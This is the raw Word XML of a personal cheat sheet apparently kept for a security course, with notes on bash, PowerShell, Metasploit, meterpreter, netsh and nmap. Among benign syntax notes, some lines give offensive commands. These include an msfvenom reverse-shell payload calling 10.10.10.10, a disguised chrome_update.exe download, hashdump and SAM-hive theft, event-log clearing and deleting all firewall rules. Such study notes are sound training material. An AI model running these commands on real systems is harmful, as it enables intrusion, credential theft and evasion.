      <w:r w:rsidR="00586B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hmod +x file.sh – for we could run the script</w:t>
      </w:r>
      <w:r w:rsidR="000D38A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le.sh – run the script</w:t>
      </w:r>
      <w:r w:rsidR="000D38A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ash file.sh – run the script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1468EBFB" w14:textId="7FD96049" w:rsidR="0052648E" w:rsidRDefault="00670C38"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enter a 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ad answer</w:t>
      </w:r>
      <w:r w:rsidR="001A6FC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input </w:t>
      </w:r>
      <w:r w:rsidR="003C2A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ad -p “enter a name: ” name – shortcut of echo and read in the same line</w:t>
      </w:r>
      <w:r w:rsidR="001A6FC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ad -s answer – get input without seeing on the screen</w:t>
      </w:r>
      <w:r w:rsidR="00D87A1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cho -e “1. Asdasd\n2. asdawd” – for using special characters as \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cho “hello $answer” – using the variable, pay attention, </w:t>
      </w:r>
      <w:r w:rsidR="00D87A1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  ‘</w:t>
      </w:r>
      <w:r w:rsidR="006208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cat erel.txt | awk ‘{print $NF}’) – insert a value to variable</w:t>
      </w:r>
      <w:r w:rsidR="001D0E2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ace is must not</w:t>
      </w:r>
      <w:r w:rsidR="00B953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ocation = $(pwd) – accumulate the current path</w:t>
      </w:r>
      <w:r w:rsidR="00F344A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umber = $((number + count)) – syntax of sum of 2 numbers </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BA59AB" w14:textId="7EC0E767" w:rsidR="0052648E" w:rsidRDefault="0052648E" w:rsidP="00E3309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WHOIS()</w:t>
      </w:r>
      <w:r w:rsidR="00E330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echo ”hello”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F4B238" w14:textId="43B0D5EF" w:rsidR="0052648E" w:rsidRDefault="0052648E"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HOI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the syntax for function, you have to remember to call the function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD0EEEE" w14:textId="77777777" w:rsidR="00CF33F1" w:rsidRDefault="0052648E" w:rsidP="00CF33F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answer” == “y”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echo “ok, by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ls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cho “wrong inpu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syntax of if, you have to put fi in the end, you have to write then line after if,</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ou can compare strings in ==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D6A5B3" w14:textId="77777777" w:rsidR="00EE1783" w:rsidRDefault="00CF33F1" w:rsidP="00EE178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name” == “” ] – check if the variable is empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ED1DEF" w14:textId="052D92E6" w:rsidR="00CC2CFA" w:rsidRDefault="00CC2CFA" w:rsidP="00CC2C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CF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grep -q '[^[:space:]]' "$first_location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eck if the file contains anything then space (to check if the file is empty of content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6C7BA7" w14:textId="4572672E" w:rsidR="00987E1B" w:rsidRDefault="00987E1B" w:rsidP="00CC2C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d “/home/kali/results” ] – check if the directory exist then, else …</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248537FE" w14:textId="32F5853E" w:rsidR="00233685" w:rsidRDefault="00233685" w:rsidP="00987E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f “$path” ] – get as input file path and check if exist then, else…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D05EA7" w14:textId="77777777" w:rsidR="00987E1B" w:rsidRDefault="00987E1B" w:rsidP="00987E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E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country" != "IL" ] &amp;&amp; [ "$country" != ""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eck the country is not israel and use &amp;&amp; for two statemnets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534DA8BF" w14:textId="51F90EDA" w:rsidR="0052648E" w:rsidRDefault="00987E1B"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E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check_if_anonymous" -eq 0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yntax to compare to number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303805E4" w14:textId="206C67F2" w:rsidR="0017417B" w:rsidRPr="00987E1B" w:rsidRDefault="0017417B" w:rsidP="0017417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17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var,,}" == "yes"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var variable converted to low characters before comparison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A1B387" w14:textId="4219EE05" w:rsidR="00930780" w:rsidRDefault="00930780"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is $ip – using whois tool to search about this i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oiplookup $ip – using geoiplookup tool to search about this ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D4AB7F" w14:textId="7D9AB174" w:rsidR="00892789" w:rsidRDefault="00892789"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glet “my project” – basic animation for beauty headline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BE04B2" w14:textId="3CB1646B" w:rsidR="00FD41BF" w:rsidRDefault="00FD41BF"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ep 2 – wait 2 seconds before continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34173CD5" w14:textId="2C0F6ECC" w:rsidR="00EB2E07" w:rsidRDefault="00EB2E07"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number i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1)</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nmap $ip -sV</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2) nmap $ip -P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cho “wrong inpu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sac</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syntax of case, the $number is a number to insert one of the cases, *) is for every number that not one of the numbers like 1 or 2 in this case dunction, esac enclose the case.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D5DED2" w14:textId="77777777" w:rsidR="004456B5" w:rsidRDefault="004456B5"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E4022" w14:textId="77777777" w:rsidR="004456B5" w:rsidRDefault="004456B5"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797C7" w14:textId="1DB60CB9" w:rsidR="004456B5" w:rsidRDefault="00D15AE0"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E0">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12DCC3" wp14:editId="5DB8EE59">
            <wp:extent cx="5274310" cy="1688465"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="71498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88331" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1688465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="002D35E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yntax for using array, and installing packages, -s for check if the package exist,</w:t>
      </w:r>
      <w:r w:rsidR="002D35E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f not, it install the package and sign -y automatically for the question if to install.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D578C8" w14:textId="46065015" w:rsidR="00233685" w:rsidRDefault="00233685"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0 – define a numerical variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3806268D" w14:textId="006476DC" w:rsidR="00CC796D" w:rsidRDefault="00CC796D"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D1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dev/null 2&gt;&amp;1</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lete all the output from the command, pay attention it will work only if you will put it in the right places, in the end of command before grep and more comman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2&gt;/dev/null – will not print error, could use to hide logo tools (as volatality)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E8F7EC" w14:textId="2B0DECA8" w:rsidR="00CF33F1" w:rsidRDefault="00CF33F1"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name=$(basename “$path”) – get full path and extract the name of the file inside the variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ED5B59" w14:textId="638BC069" w:rsidR="00730659" w:rsidRDefault="00D924ED"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file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06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 the name of file and extract the name of the extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED6E857" w14:textId="0A84234C" w:rsidR="00730659" w:rsidRDefault="00730659"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t; asd.txt – creates an empty file and override if already exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7B6F58" w14:textId="48F9C586" w:rsidR="00596447" w:rsidRDefault="00596447"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44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_seconds=$(date -d "$start_time" +%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the current time in epoch time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000AED10" w14:textId="77777777" w:rsidR="00CE3331" w:rsidRDefault="00CE3331"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38434" w14:textId="3C9C22D5" w:rsidR="00D8498F" w:rsidRDefault="00CE3331" w:rsidP="00CE3331">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331">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00D8498F" w:rsidRPr="00D8498F">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F1200B" wp14:editId="0F7A2B22">
            <wp:extent cx="6237515" cy="1607066"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="143983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34320" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6268583" cy="1615071"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AABC8FD" w14:textId="7555F486" w:rsidR="00CE3331" w:rsidRDefault="00CE3331" w:rsidP="00CE33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the syntax of the for loop is to take info on ip by using tools like nmap and masscan, by using &amp; in the end of the loop, it is does the scanning on all the ips in the list simultaneously and save time, by wait command, it wait for the process to end before continue to the next command s in the automation, by timeout 30 , it limit the scan for 30 seconds, by using ${ip}_nmap.txt it know to refer to the ip variable and not search for ip_nmap variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4166AC3A" w14:textId="77777777" w:rsidR="00CF33F1" w:rsidRDefault="00CF33F1"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E17206" w14:textId="77777777" w:rsidR="005578F8" w:rsidRDefault="005578F8"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45D5F" w14:textId="77777777" w:rsidR="005578F8" w:rsidRDefault="005578F8"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97EF9C" w14:textId="77777777" w:rsidR="00F36876" w:rsidRDefault="00F36876"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7EA233"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7EB742"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48E241"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AF076E"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84428"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ABA7A"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9EB7E9"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B57E7B"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5864C"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D28F8"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B0E06"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357C26"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5B233"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BA9C7D"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066DCC"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69607"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B8F07" w14:textId="7322EB1A" w:rsidR="00F36876" w:rsidRPr="000C387E" w:rsidRDefault="00F36876" w:rsidP="00F36876">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owershell </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s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F66CB5D" w14:textId="6AE5C162" w:rsidR="002F60DB" w:rsidRDefault="00F613E9" w:rsidP="00FF6A8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name - </w:t>
      </w:r>
      <w:r w:rsidRPr="00F613E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s the network name of the current computer</w:t>
      </w:r>
      <w:r w:rsidR="004759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75987" w:rsidRPr="00B97B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GridView</w:t>
      </w:r>
      <w:r w:rsidR="004759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nderrated command for open the ouput in comfortable GUI and use text manipulation, recommended when need to deal with the same output for a while</w:t>
      </w:r>
      <w:r w:rsidR="006A79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hildItem – get all the items (files and directories) in my current location</w:t>
      </w:r>
      <w:r w:rsidR="00C95C6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hildItem | measure – counts the items (similar to wc -l)</w:t>
      </w:r>
      <w:r w:rsidR="00FF6A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Location – show my current location (similar to pwd)</w:t>
      </w:r>
      <w:r w:rsidR="00B77A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77A37" w:rsidRPr="00B77A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FileHash .\.node_repl_history -Algorithm md5</w:t>
      </w:r>
      <w:r w:rsidR="00B77A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md5 hash of a file</w:t>
      </w:r>
      <w:r w:rsidR="0069795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ommand -commandtype cmdlet – show all the cmdlet commands</w:t>
      </w:r>
      <w:r w:rsidR="005578F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ommand -name “*invoke*” – find all the commands that contains the string “invoke”</w:t>
      </w:r>
      <w:r w:rsidR="004E721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Help Invoke-Webrequest -examples – will show examples of use this command</w:t>
      </w:r>
      <w:r w:rsidR="002F60D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Alias cd – show the parallel command in powershell</w:t>
      </w:r>
      <w:r w:rsidR="008A0F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ontent auth.log – get the content of the file (similar to cat)</w:t>
      </w:r>
      <w:r w:rsidR="00024C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ontent auth.log | Select-Object -Index 994 – get line 995 from the file (count from 0)</w:t>
      </w:r>
      <w:r w:rsidR="00C874E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Date – get the current date</w:t>
      </w:r>
      <w:r w:rsid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C5241" w:rsidRP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NetTCPConnection</w:t>
      </w:r>
      <w:r w:rsid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 data on</w:t>
      </w:r>
      <w:r w:rsidR="00EE29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CP</w:t>
      </w:r>
      <w:r w:rsid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s </w:t>
      </w:r>
      <w:r w:rsidR="00EE29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achine</w:t>
      </w:r>
      <w:r w:rsidR="00EF3D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F3DD2" w:rsidRPr="00EF3D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NetUDPEndpoint</w:t>
      </w:r>
      <w:r w:rsidR="00EF3D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 data on UDP ports (it is not called connections cause in UDP there is not 3-way handshake, meaning there is not process of connection)</w:t>
      </w:r>
      <w:r w:rsidR="00220C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20C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97BF5" w:rsidRPr="00B97B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ChildItem . -Recurse | Get-FileHash -Algorithm MD5 | Out-GridView</w:t>
      </w:r>
      <w:r w:rsidR="00B97B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all the files recursively (also those inside the directories) from you location, find their md5 hash and open GUI to see the output, and filter the output in more comfortable way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB3D4EC" w14:textId="0420F86A" w:rsidR="002C5B72" w:rsidRDefault="002C5B72" w:rsidP="00F613E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B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ChildItem -File | Sort-Object Length -Descending | Select-Object -First 1</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 only the file in my current location then sort them by length in descending order, and output the first</w:t>
      </w:r>
      <w:r w:rsidR="00A47F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le – show only files</w:t>
      </w:r>
      <w:r w:rsidR="00A47F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irectory – show only directories</w:t>
      </w:r>
      <w:r w:rsidR="00A47F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curse – search recursively (inside directories)</w:t>
      </w:r>
      <w:r w:rsidR="00A47F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ame – search by name</w:t>
      </w:r>
      <w:r w:rsidR="008E75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ort-Object length -Descending – sort all the objects by length in Descending order</w:t>
      </w:r>
      <w:r w:rsidR="008E75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lect-Object -First 1 – output only the first one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F828776" w14:textId="5E9FF2B4" w:rsidR="008E6B86" w:rsidRDefault="007B0372"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3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ChildItem -Recurse -File -Filter "auth.log" | Select-Object Mode, LastWriteTime, Length, Name, Full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recursively the auth.log file and show only info on it as </w:t>
      </w:r>
      <w:r w:rsidR="00B110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 and more</w:t>
      </w:r>
      <w:r w:rsidR="00B110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lter – search for the name of the file</w:t>
      </w:r>
      <w:r w:rsidR="00BD43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ullname – full path for the file</w:t>
      </w:r>
      <w:r w:rsidR="00B110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astWriteTime – the last time the file was changed</w:t>
      </w:r>
      <w:r w:rsidR="00BD43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Length – the size of the file </w:t>
      </w:r>
      <w:r w:rsidR="00BD43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000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Process – show all the processes and show stats</w:t>
      </w:r>
      <w:r w:rsidR="00977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775E5" w:rsidRPr="00977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Process | sort -Property cpu</w:t>
      </w:r>
      <w:r w:rsidR="00977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ort all the processes by cpu column</w:t>
      </w:r>
      <w:r w:rsidR="00AC4B7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C4B75" w:rsidRPr="00977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 -Property</w:t>
      </w:r>
      <w:r w:rsidR="00AC4B7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pu – sort by column cpu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7566321D" w14:textId="77777777" w:rsidR="00CC6C94" w:rsidRDefault="008E6B86"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B8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Process | Where-Object{$_.ProcessName -eq "lsas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the line of the process named lsass (by the column Process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E6B8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t-Process | Where-Object{$_.ProcessName -eq "lsass"} | Select-Object Name,Path</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tract only the properties name and path of the process lsass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0F7EB9" w14:textId="2DC7C0D2" w:rsidR="00B64404" w:rsidRDefault="00B64404" w:rsidP="00D372E2">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AD… - </w:t>
      </w:r>
      <w:r w:rsidRPr="00B644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need to have the Active Directory module installe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644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ve Identifier (RID) is part of the security identifier (SI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644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ADUs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nd RID of the us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ADGroup – find RID of the grou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Get-ADUser donna </w:t>
      </w:r>
      <w:r w:rsid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the RID of the user donna</w:t>
      </w:r>
      <w:r w:rsid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372E2" w:rsidRP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ADUser -Filter * | Where-Object { $_.SID.Value -match '-501$' }</w:t>
      </w:r>
      <w:r w:rsid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om all the ADUsers its find the one with RID 501</w:t>
      </w:r>
      <w:r w:rsidR="00E704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ADUser -Filter * -Properties PasswordLastSet – shows the last time the password</w:t>
      </w:r>
      <w:r w:rsidR="009D4D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w:t>
      </w:r>
      <w:r w:rsidR="00E704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w:t>
      </w:r>
      <w:r w:rsidR="00B01DE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ADComputer -filter * - show all the computers in the domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7969441C" w14:textId="77777777" w:rsidR="00CC6C94" w:rsidRDefault="00CC6C94"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Service – get all the services and their status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049EAC90" w14:textId="77777777" w:rsidR="00FE275B" w:rsidRDefault="00CC6C94"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volume – get data on hard disks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6580D9" w14:textId="55A819DF" w:rsidR="00D85A07" w:rsidRDefault="00D85A07"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A0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ExecutionPolic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 my policy</w:t>
      </w:r>
      <w:r w:rsidR="00531F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evels between restricted to </w:t>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pass</w:t>
      </w:r>
      <w:r w:rsidR="001E4F2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 levels</w:t>
      </w:r>
      <w:r w:rsidR="00531F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1F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pas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every script can run</w:t>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does not even alert the user</w:t>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nrestricted means every script can run, but it d</w:t>
      </w:r>
      <w:r w:rsidR="003728B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es prompt the user</w:t>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1F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stricted means no scripts are allowed to run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DF3F34" w14:textId="5C42A07C" w:rsidR="00495A6E" w:rsidRPr="00BB17D9" w:rsidRDefault="00495A6E" w:rsidP="00BB17D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inEvent -Path .\log.evtx – read event file</w:t>
      </w:r>
      <w:r w:rsidR="00BB17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 the name of the event)</w:t>
      </w:r>
      <w:r w:rsidR="00BB17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WinEvent -Path .\log.evtx | Format-List – read the event file with the content of every event</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564EB194" w14:textId="77777777" w:rsidR="00FE275B" w:rsidRDefault="00FE275B" w:rsidP="00FE275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Location favorites – go inside favorites directory (similar to cd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F35FCAC" w14:textId="52F7AB2A" w:rsidR="00045548" w:rsidRPr="00045548" w:rsidRDefault="00045548" w:rsidP="0004554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54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String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log</w:t>
      </w:r>
      <w:r w:rsidRPr="0004554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 140.206.157.242 | Measure-Objec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unts the amount of times th</w:t>
      </w:r>
      <w:r w:rsidR="007B25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p show in the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1917E50C" w14:textId="77777777" w:rsidR="00FE275B" w:rsidRDefault="00FE275B" w:rsidP="00FE275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oke-Webrequest -Uri </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="001F3576">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10.10.10.10:1212/chrome_update.exe</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file c:\users\...\chrome.exe – ask from the ip 10.10.10.10 in port 1212 (the port need to be open already) the file chrome_update.exe and name it as chrome.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D74C44" w14:textId="77777777" w:rsidR="00061C0E" w:rsidRDefault="00A625A1" w:rsidP="00A625A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g 8.8.8.8 – check the connection with 8.8.8.8 i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onnection -ComputerName 8.8.8.8</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eck the connection, but return more info then ping</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NetConnection -ComputerName 8.8.8.8</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turn more info on the connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D235AB" w14:textId="20FDFCFF" w:rsidR="00FE275B" w:rsidRDefault="00061C0E" w:rsidP="000E6152">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C0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Hos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61C0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for displaying information directly to the conso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cant save info with that command into a variable or file</w:t>
      </w:r>
      <w:r w:rsid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E6152" w:rsidRPr="008F37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Host "Hello"</w:t>
      </w:r>
      <w:r w:rsid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nt hello</w:t>
      </w:r>
      <w:r w:rsid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rite-Output – print the data, also enable us to save the info inside a file or variable</w:t>
      </w:r>
      <w:r w:rsid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61C0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Outpu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llo</w:t>
      </w:r>
      <w:r w:rsidR="000E6152" w:rsidRP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ut-File "file.txt" </w:t>
      </w:r>
      <w:r w:rsid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isplay hello, and also save it into a file</w:t>
      </w:r>
      <w:r w:rsid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E27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str hello – find string hello in a file</w:t>
      </w:r>
      <w:r w:rsidR="00FE27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ndstr /I hello – ignoring case sensitive find the string hello in the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D00C87" w14:textId="696EB14D" w:rsidR="00065E66" w:rsidRDefault="00065E66" w:rsidP="00065E6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E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Action SilentlyContinu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lag used in script to continue the script even if there is an error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF06EAA" w14:textId="77777777" w:rsidR="00FE275B" w:rsidRPr="00FE275B" w:rsidRDefault="00FE275B" w:rsidP="00FE275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920229" w14:textId="1CBC72D2" w:rsidR="0072035A" w:rsidRDefault="00817295" w:rsidP="009C77E4">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4590F47" w14:textId="18C8794F" w:rsidR="003D0B21" w:rsidRPr="000C387E" w:rsidRDefault="003D0B21" w:rsidP="003D0B21">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sfconsole</w:t>
      </w:r>
      <w:r w:rsidR="00614931">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venom</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0CEDA82A" w14:textId="731A1108" w:rsidR="003D0B21" w:rsidRDefault="003D0B21"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6 – command line of msfconso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uxiliary – a piece of code with specific meaning such as connect in anonymous to ft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ayload – type of communication such as reverse_tcp or bind and mor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ncoder – help us to hide the payload for we will not be detecte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st exploitation – we will use that after we got a session, for get more date or improve the session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7090412D" w14:textId="3C83476C" w:rsidR="006E5D31" w:rsidRDefault="00F06909"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type:auxiliary – for specific something we want to get and not exploi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 type:exploit – for scripts for exploits and get a sess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 type:post – for scripts for upgrade sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A62CFF" w14:textId="53A7144F" w:rsidR="00460961" w:rsidRDefault="006E5D31" w:rsidP="00010244">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8 – use one of the script in the list</w:t>
      </w:r>
      <w:r w:rsidR="004B74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fo – will give me info on the option we choos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options – search which </w:t>
      </w:r>
      <w:r w:rsidR="00D1413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to enter</w:t>
      </w:r>
      <w:r w:rsidR="00FF3DB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how payloads – show which payload we can choose</w:t>
      </w:r>
      <w:r w:rsidR="00FF3DB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t payload … - choose the payload</w:t>
      </w:r>
      <w:r w:rsidR="0009466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t rhost … - define the ip to attack</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un/exploit – run the sript</w:t>
      </w:r>
      <w:r w:rsidR="0081729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un -j – run as job in the background, like when opening a port and waiting for the target to talk to us</w:t>
      </w:r>
      <w:r w:rsidR="0081729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jobs – show all the jobs in the background</w:t>
      </w:r>
      <w:r w:rsidR="003A0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g/background – save the session in the background so we can do other things as attack other hosts</w:t>
      </w:r>
      <w:r w:rsidR="002010E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0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n new sessions </w:t>
      </w:r>
      <w:r w:rsidR="002010E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3A0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grade the current sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD6D5E7" w14:textId="11CAF6EE" w:rsidR="003D3CFF" w:rsidRDefault="00460961" w:rsidP="00D80B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shell to meterpreter type:post – search for upgrade the session</w:t>
      </w:r>
      <w:r w:rsidR="00E127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ssions -u 2 – try to upgrade session 2</w:t>
      </w:r>
      <w:r w:rsidR="002D71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 shell_to_meterpreter – it is post exploitation, for upgrade the session</w:t>
      </w:r>
      <w:r w:rsidR="0004290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 suggester – suggest us what to use for upgrade the session</w:t>
      </w:r>
      <w:r w:rsidR="005C2B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E11E3E6" w14:textId="29BBC62F" w:rsidR="00D80B1B" w:rsidRDefault="00D80B1B" w:rsidP="00D80B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multi/handler – listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD19E71" w14:textId="6E1DD5D2" w:rsidR="00A74E5E" w:rsidRDefault="00A74E5E" w:rsidP="00D80B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erpreter commands:</w:t>
      </w:r>
      <w:r w:rsidR="008154F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uid – get user i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pid – get the current process indentifier</w:t>
      </w:r>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s – list of the processes</w:t>
      </w:r>
      <w:r w:rsidR="003B1C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ysinfo – find data on the system such as hostname</w:t>
      </w:r>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hell – we can use that to get a shell</w:t>
      </w:r>
      <w:r w:rsidR="002A67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ashdump – hashes of the passwords of the users</w:t>
      </w:r>
      <w:r w:rsidR="005033D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migrate -N svchost.exe – migrate to another process by its name to get privileged </w:t>
      </w:r>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learev – clear the events log</w:t>
      </w:r>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ecute – execute a command</w:t>
      </w:r>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boot – reboot the computer</w:t>
      </w:r>
      <w:r w:rsidR="00AB08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grep – search string as grep command</w:t>
      </w:r>
      <w:r w:rsidR="002656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 -f accounts.txt – find a path to this file (similar to find command in linux)</w:t>
      </w:r>
      <w:r w:rsidR="00AA154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g save HKLM\sam c:\sam.hiv – save the file sam.hiv on the computer than you can download it from there</w:t>
      </w:r>
      <w:r w:rsidR="00930AF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30AF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wnload sam.hiv – download this file to our machine</w:t>
      </w:r>
      <w:r w:rsidR="0002682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samdump2 system.hiv sam.hiv -o secret_win – make hashdump from the files system.hiv and sam.hiv we downloaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5951C3AF" w14:textId="2F969620" w:rsidR="00614931" w:rsidRDefault="006C63AB"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fvenom --list payloads | grep meterpreter – give a list of meterpreter payloads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1493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msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.10 lport=7878 -f exe &gt;&gt; file.exe – create payload and name it exe</w:t>
      </w:r>
      <w:r w:rsidR="00CD19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reverse payload so we need the target to turn this file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200AFB0E" w14:textId="05F76AAC" w:rsidR="00E34555" w:rsidRDefault="00E34555"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msfdb init – create postgresql databas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orkspace – shows all the workspaces that exis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orkspace -a hello – add new workspace called hell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orkspace default – switch to the default workspace called defaul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osts -c address – the flag -c behave as awk and find the address colum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rvices -S ‘vsftpd’  - behave as grep and search vsftp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32E7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b_nmap 10.10.10.10 -p 21 -sV – save the results to the DB of </w:t>
      </w:r>
      <w:r w:rsidR="001651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sploit</w:t>
      </w:r>
      <w:r w:rsidR="001651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b_export /path/file.xml – export the DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A96E133" w14:textId="3E188790" w:rsidR="00FF42A0" w:rsidRDefault="00FF42A0"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auxiliary/admin/smb/ms17_010_command – auxiliary for exploit smb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225E4C7B" w14:textId="567EA552" w:rsidR="005C2B40" w:rsidRDefault="000D61EA"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command “powershell Get-NetFirewallProfile” – when we want to run powershell command, we need first to write powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A46724" w14:textId="77777777" w:rsidR="0096541F" w:rsidRDefault="0096541F"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0BA6B" w14:textId="5A6F6A8A" w:rsidR="005C2B40" w:rsidRPr="000C387E" w:rsidRDefault="005C2B40" w:rsidP="005C2B40">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wall</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63771259" w14:textId="44A2A3F7" w:rsidR="005C2B40" w:rsidRPr="004456B5" w:rsidRDefault="002C1548"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sh – network shel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E119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sh advfirewall</w:t>
      </w:r>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ewall show rule name=ICMP_allow – shows data on the predefined rule called ICMP_allow</w:t>
      </w:r>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h advfirewall firewall delete rule name=all – delete all the rules</w:t>
      </w:r>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h advfirewall firewall add rule name = allow_server dir=in action=allow remoteip = 10.10.10.10 – allow incoming traffic from the ip 10.10.10.10</w:t>
      </w:r>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etsh advfirewall firewall add rule name=accept_443 protocol=TCP dir=out localport=80 action=allow – enable communication outside in port 80 in TCP protocol </w:t>
      </w:r>
      <w:r w:rsidR="00CD32C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h advfirewall firewall set rule name=Allow_ICMP dir =in new action=block protocol=ICMPv4 – change exist rule (set command) to block ping</w:t>
      </w:r>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B6F8194" w14:textId="77777777" w:rsidR="001A6FC4" w:rsidRDefault="001A6FC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C953D" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E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E2328" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E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40BFE4" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E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D627D" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E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61105" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRPr="00892789" w:rsidRDefault="009C77E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7248F1" w14:textId="77777777" w:rsidR="00502E69" w:rsidRPr="00502E69" w:rsidRDefault="00502E69" w:rsidP="0013683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9DF0B0" w14:textId="2137E2C5" w:rsidR="000C387E" w:rsidRPr="000C387E" w:rsidRDefault="000C387E" w:rsidP="000C387E">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map</w:t>
      </w:r>
      <w:r w:rsidR="00D8498F">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can</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0208A4CE" w14:textId="189C453A" w:rsidR="00132564" w:rsidRPr="00132564" w:rsidRDefault="00296C76" w:rsidP="00BF783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 – scans the default 1000 ports on the i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 -Pn – does not use ping before scanning the ip, it assumes the destination exist, sometimes there are destinations that block ping, and the default for nmap is that when it does not find the host is active It won’t search for open ports so we want to use -P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 -p- - scans all the ports (</w:t>
      </w:r>
      <w:r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535</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 -F – scan the default 100 ports</w:t>
      </w:r>
      <w:r w:rsidR="00C00D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 -sV – scan service versions</w:t>
      </w:r>
      <w:r w:rsidR="006237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 -sn – check if the host is u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3389 – scan only rdp por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3389,22,53 – scan few port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4350B"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w:t>
      </w:r>
      <w:r w:rsidR="0074350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20 - 100 – scan range of ports</w:t>
      </w:r>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24 – scan all the subnet</w:t>
      </w:r>
      <w:r w:rsidR="0074350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3BEF"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w:t>
      </w:r>
      <w:r w:rsidR="008E3BE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open – shows in the output only open ports</w:t>
      </w:r>
      <w:r w:rsidR="00BF78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F7833" w:rsidRPr="00BF78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vulners.nse</w:t>
      </w:r>
      <w:r w:rsidR="00BF78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ust to come with -sV for have the versions of the machine it scan, the script check the version of the services of the machine, and check if there is already known vulnerability by checking in the v</w:t>
      </w:r>
      <w:r w:rsidR="00BF7833" w:rsidRPr="00BF78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ners database</w:t>
      </w:r>
      <w:r w:rsidR="006237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cript</w:t>
      </w:r>
      <w:r w:rsidR="00F806E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37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p-anon.nse – check if anonymous is user in the target (in ftp)</w:t>
      </w:r>
      <w:r w:rsidR="009E75D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E75D5"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ftp-brute.nse</w:t>
      </w:r>
      <w:r w:rsidR="009E75D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y connect to ftp using common and simple credentials</w:t>
      </w:r>
      <w:r w:rsidR="0039333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cript=smb-os-discovery – exploit the smb service to try to get data as hostname, operating system, domain name and more.</w:t>
      </w:r>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32564" w:rsidRP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2564" w:rsidRP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default</w:t>
      </w:r>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C is shorthand of </w:t>
      </w:r>
      <w:r w:rsidR="00132564" w:rsidRP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default</w:t>
      </w:r>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tell nmap to run a default set of basic scripts of nmap for get info on the target</w:t>
      </w:r>
    </w:p>
